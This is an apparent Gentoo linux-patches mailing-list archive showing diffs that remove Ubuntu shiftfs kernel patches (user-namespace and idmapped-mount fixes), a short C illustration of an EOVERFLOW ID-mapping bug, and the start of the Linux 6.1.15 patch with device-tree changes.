-+	};
- 	int err = -EINVAL;
- 	const struct cred *oldcred;
- 
-@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		goto out_unlock;
- 
- 	oldcred = shiftfs_override_creds(old->d_sb);
--	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
--			 NULL, flags);
-+	err = vfs_rename(&rd);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(loweri_dir_old, olddir);
-@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 	return d_splice_alias(inode, dentry);
- }
- 
--static int shiftfs_permission(struct inode *inode, int mask)
-+static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
- {
- 	int err;
- 	const struct cred *oldcred;
-@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(inode, mask);
-+	err = generic_permission(ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(loweri, mask);
-+	err = inode_permission(ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
- 	return err;
- }
- 
--static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_tmpfile(struct user_namespace *ns,
-+			   struct inode *dir, struct dentry *dentry,
- 			   umode_t mode)
- {
- 	int err;
-@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
- }
- 
--static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
-@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(dentry, attr);
-+	err = setattr_prepare(ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, &newattr, NULL);
-+	err = notify_change(ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	return err;
- }
- 
--static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+static int shiftfs_getattr(struct user_namespace *ns,
-+			   const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
-@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
- 			break;
- 		case ACL_GROUP:
--			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
- 			kgid = shift_kgid(from, to, kgid);
--			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
- 			break;
- 		default:
- 			break;
-@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 	}
- }
- 
--static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
-+static struct posix_acl *
-+shiftfs_get_acl(struct inode *inode, int type, bool rcu)
- {
- 	struct inode *loweri = inode->i_private;
- 	const struct cred *oldcred;
-@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- 	int size;
- 	int err;
- 
-+	if (rcu)
-+		return ERR_PTR(-ECHILD);
-+
- 	if (!IS_POSIXACL(loweri))
- 		return NULL;
- 
-@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
- 
- static int
- shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct user_namespace *ns,
- 			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
-@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(inode))
-+	if (!inode_owner_or_capable(ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(dentry, handler->name);
-+		err = shiftfs_removexattr(ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 13 Apr 2022 15:26:22 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
-Cc: mpagano@gentoo.org
-
-With the porting of shiftfs from 5.15 to 5.17, some filesystem-related
-functions now take a struct user_namespace argument; however, shiftfs
-logic still relies on these functions using the main filesystem
-namespace.
-
-Make sure to always use init_user_ns to prevent breakage of system
-components that rely on shiftfs.
-
-Without this fix lxd was showing some issues, like failing to create any
-file inside a container when shiftfs was used (e.g., using zfs as
-storage pool).
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
- 1 file changed, 24 insertions(+), 26 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 76c54bc12018..a21624c529f0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct user_namespace *ns,
--			    struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
-+	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(ns, lowerd, name);
-+	err = vfs_removexattr(&init_user_ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(ns, dentry, name);
--	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(&init_user_ns, dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct user_namespace *ns,
--				 struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(ns, inode, diri, mode);
-+		inode_init_owner(&init_user_ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
-@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
- }
- 
- static int shiftfs_mknod(struct user_namespace *ns,
-@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(ns, inode, mask);
-+	err = generic_permission(&init_user_ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(ns, loweri, mask);
-+	err = inode_permission(&init_user_ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(ns, dentry, attr);
-+	err = setattr_prepare(&init_user_ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(ns, lowerd, &newattr, NULL);
-+	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(ns, dentry, handler->name);
-+		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 27 Apr 2022 18:20:41 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21624c529f0..a5338dc6290c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -21,6 +21,7 @@
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
- #include <linux/fiemap.h>
-+#include <linux/pagemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Tue, 18 Oct 2022 17:09:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a5338dc6290c..34f080ae0fec 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
- }
- 
- static int shiftfs_tmpfile(struct user_namespace *ns,
--			   struct inode *dir, struct dentry *dentry,
-+			   struct inode *dir, struct file *file,
- 			   umode_t mode)
- {
- 	int err;
- 	const struct cred *oldcred;
--	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
- 
- 	if (!loweri->i_op->tmpfile)
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
--- 
-2.39.2
-
-From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
-From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Date: Tue, 31 Jan 2023 17:11:48 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1990849
-
-We have never supported idmapped layers with shiftfs and, moreover,
-that makes no sense: once the lower fs supports idmapped mounts,
-shiftfs is not needed.
-
-Starting from linux-image-5.15.0-48-generic, users started seeing
-EOVERFLOW errors from the userspace side on trivial fs operations
-inside containers.
-
-This is caused by the patches ("fs: tweak fsuidgid_has_mapping()") and
-("fs: support mapped mounts of mapped filesystems"). These patches
-extend and enable idmapped mount support in the Ubuntu kernel, but the
-problem is that shiftfs was not properly ported.
-
-See also:
-("namei: prepare for idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
-("overlayfs: do not mount on top of idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
-as a reference.
-
-This patch should be applied on top of kinetic/master-next and is based
-on the changes by Andrea Righi in 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
-
-This commit, together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns"),
-has to be ported to the jammy tree too.
-
-Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
-Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
-Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Acked-by: Tim Gardner <tim.gardner@canonical.com>
-Acked-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 16 +++++++++++++---
- 1 file changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index cda74b614505..2664e1fb65d3 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	struct renamedata rd = {
--		.old_mnt_userns	= ns,
-+		.old_mnt_userns	= &init_user_ns,
- 		.old_dir	= loweri_dir_old,
- 		.old_dentry	= lowerd_old,
--		.new_mnt_userns	= ns,
-+		.new_mnt_userns	= &init_user_ns,
- 		.new_dir	= loweri_dir_new,
- 		.new_dentry	= lowerd_new,
- 	};
-@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(ns, inode))
-+	if (!inode_owner_or_capable(&init_user_ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
-@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	/*
-+	 * It makes no sense to handle idmapped layers from shiftfs.
-+	 * And we didn't support it properly anyway.
-+	 */
-+	if (is_idmapped_mnt(path.mnt)) {
-+		err = -EINVAL;
-+		pr_err("idmapped layers are currently not supported\n");
-+		goto out_put_path;
-+	}
-+
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
--- 
-2.39.2
-
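For context on the EOVERFLOW fix above: shiftfs performs its own ID shifting via init_user_ns, so mounting it on top of an idmapped lower mount would translate IDs twice, and any ID the second mapping cannot represent is reported to user space as EOVERFLOW. A reduced, standalone C model of that double-translation failure (the types, names, and ranges here are illustrative only, not kernel API):

#include <stdio.h>

typedef unsigned int xuid_t;
#define INVALID_XUID ((xuid_t)-1)

/* One ID-mapping layer: [host_base, host_base + range) on the host maps to
 * [ns_base, ns_base + range) in the namespace; IDs outside the range have
 * no mapping, which the VFS surfaces to user space as EOVERFLOW.
 */
struct idmap { xuid_t ns_base, host_base, range; };

static xuid_t map_down(struct idmap m, xuid_t host)
{
	if (host < m.host_base || host - m.host_base >= m.range)
		return INVALID_XUID;
	return m.ns_base + (host - m.host_base);
}

int main(void)
{
	struct idmap mnt   = { 0, 100000, 65536 };  /* idmapped-mount layer */
	struct idmap shift = { 0, 100000, 65536 };  /* shiftfs layer, same shift */

	xuid_t once    = map_down(mnt, 100000);   /* -> 0: the intended container view */
	xuid_t stacked = map_down(shift, once);   /* 0 has no mapping -> invalid ID */

	printf("one layer: %u, stacked: %d\n", once, (int)stacked);
	return 0;
}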


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-03 12:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-03 12:28 UTC (permalink / raw
  To: gentoo-commits

commit:     cc989ca8dddb899405562c2fe5e9567d03aee7fe
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 12:28:17 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 12:28:17 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cc989ca8

Linux patch 6.1.15

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1014_linux-6.1.15.patch | 1648 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 1652 insertions(+)

diff --git a/0000_README b/0000_README
index aa47ca9b..328fcd23 100644
--- a/0000_README
+++ b/0000_README
@@ -99,6 +99,10 @@ Patch:  1013_linux-6.1.14.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.14
 
+Patch:  1014_linux-6.1.15.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.15
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1014_linux-6.1.15.patch b/1014_linux-6.1.15.patch
new file mode 100644
index 00000000..03dcc23c
--- /dev/null
+++ b/1014_linux-6.1.15.patch
@@ -0,0 +1,1648 @@
+diff --git a/Documentation/trace/ftrace.rst b/Documentation/trace/ftrace.rst
+index 60bceb018d6a9..21f01d32c9598 100644
+--- a/Documentation/trace/ftrace.rst
++++ b/Documentation/trace/ftrace.rst
+@@ -2940,7 +2940,7 @@ Produces::
+               bash-1994  [000] ....  4342.324898: ima_get_action <-process_measurement
+               bash-1994  [000] ....  4342.324898: ima_match_policy <-ima_get_action
+               bash-1994  [000] ....  4342.324899: do_truncate <-do_last
+-              bash-1994  [000] ....  4342.324899: should_remove_suid <-do_truncate
++              bash-1994  [000] ....  4342.324899: setattr_should_drop_suidgid <-do_truncate
+               bash-1994  [000] ....  4342.324899: notify_change <-do_truncate
+               bash-1994  [000] ....  4342.324900: current_fs_time <-notify_change
+               bash-1994  [000] ....  4342.324900: current_kernel_time <-current_fs_time
+diff --git a/Makefile b/Makefile
+index 3e82a32243626..4dfe902b7f193 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 14
++SUBLEVEL = 15
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/rk3288.dtsi b/arch/arm/boot/dts/rk3288.dtsi
+index 487b0e03d4b43..2ca76b69add78 100644
+--- a/arch/arm/boot/dts/rk3288.dtsi
++++ b/arch/arm/boot/dts/rk3288.dtsi
+@@ -1181,6 +1181,7 @@
+ 		clock-names = "dp", "pclk";
+ 		phys = <&edp_phy>;
+ 		phy-names = "dp";
++		power-domains = <&power RK3288_PD_VIO>;
+ 		resets = <&cru SRST_EDP>;
+ 		reset-names = "dp";
+ 		rockchip,grf = <&grf>;
+diff --git a/arch/arm/boot/dts/stihxxx-b2120.dtsi b/arch/arm/boot/dts/stihxxx-b2120.dtsi
+index 2aa94605d3d47..d52a7aaa10743 100644
+--- a/arch/arm/boot/dts/stihxxx-b2120.dtsi
++++ b/arch/arm/boot/dts/stihxxx-b2120.dtsi
+@@ -178,7 +178,7 @@
+ 				tsin-num = <0>;
+ 				serial-not-parallel;
+ 				i2c-bus = <&ssc2>;
+-				reset-gpios = <&pio15 4 GPIO_ACTIVE_HIGH>;
++				reset-gpios = <&pio15 4 GPIO_ACTIVE_LOW>;
+ 				dvb-card = <STV0367_TDA18212_NIMA_1>;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts b/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts
+index aa22a0c222655..5d5d9574088ca 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts
+@@ -96,7 +96,6 @@
+ 			linux,default-trigger = "heartbeat";
+ 			gpios = <&rk805 1 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+-			mode = <0x23>;
+ 		};
+ 
+ 		user_led: led-1 {
+@@ -104,7 +103,6 @@
+ 			linux,default-trigger = "mmc1";
+ 			gpios = <&rk805 0 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+-			mode = <0x05>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi
+index 6e29e74f6fc68..783120e9cebeb 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi
+@@ -111,7 +111,7 @@
+ 		};
+ 	};
+ 
+-	dmc_opp_table: dmc_opp_table {
++	dmc_opp_table: opp-table-3 {
+ 		compatible = "operating-points-v2";
+ 
+ 		opp00 {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts b/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts
+index 2e058c3150256..fccc2b2f327df 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts
+@@ -83,6 +83,13 @@
+ 	};
+ };
+ 
++&cpu_alert0 {
++	temperature = <65000>;
++};
++&cpu_alert1 {
++	temperature = <68000>;
++};
++
+ &cpu_l0 {
+ 	cpu-supply = <&vdd_cpu_l>;
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+index 44313a18e484e..bab46db2b18cd 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+@@ -521,6 +521,8 @@
+ };
+ 
+ &i2s1_8ch {
++	pinctrl-names = "default";
++	pinctrl-0 = <&i2s1m0_sclktx &i2s1m0_lrcktx &i2s1m0_sdi0 &i2s1m0_sdo0>;
+ 	rockchip,trcm-sync-tx-only;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 164708f1eb674..1d423daae971b 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -966,6 +966,7 @@
+ 		clock-names = "aclk_mst", "aclk_slv",
+ 			      "aclk_dbi", "pclk", "aux";
+ 		device_type = "pci";
++		#interrupt-cells = <1>;
+ 		interrupt-map-mask = <0 0 0 7>;
+ 		interrupt-map = <0 0 0 1 &pcie_intc 0>,
+ 				<0 0 0 2 &pcie_intc 1>,
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+index 7069f51bc120e..99136adb1857f 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb0_hsphy0>, <&usb0_ssphy0>;
+ };
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+index a3cfa8113ffb2..4c960f455461c 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
